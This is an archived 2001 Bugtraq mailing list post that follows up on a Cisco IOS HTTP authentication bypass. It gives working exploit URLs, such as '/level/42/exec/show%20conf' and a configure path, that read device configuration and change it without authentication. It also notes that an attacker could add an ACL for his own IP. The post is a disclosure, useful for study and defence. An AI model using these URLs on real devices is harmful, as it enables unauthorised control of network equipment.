[21312] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Cisco device HTTP exploit...

daemon@ATHENA.MIT.EDU (Half Adder)
Mon Jul 2 22:07:32 2001

Date: Mon, 2 Jul 2001 13:56:37 -0700 (MST)
From: Half Adder <dps@Lib-Vai.lib.asu.edu>
To: bugtraq@securityfocus.com
Message-ID: <Pine.LNX.3.96.1010702134611.22995B-100000@Lib-Vai.lib.asu.edu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

You can also run configuration commands. :)

http://169.254.0.15/level/42/configure/-/banner/motd/LINE, etc.

Start with http://169.254.0.16/level/xx/configure  and go from there.

A malicious user could use:

http://169.254.0.15/level/42/exec/show%20conf

to get, for instance, vty 0 4 acl information and then add an ACL for
his/her source ip. 

I tested creating a banner.  I assume other configure commands will work
as well.  This was tested on a Cisco switch.  Anyone?


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[21312] in bugtraq

Cisco device HTTP exploit...

daemon@ATHENA.MIT.EDU (Half Adder)Mon Jul 2 22:07:32 2001

daemon@ATHENA.MIT.EDU (Half Adder)
Mon Jul 2 22:07:32 2001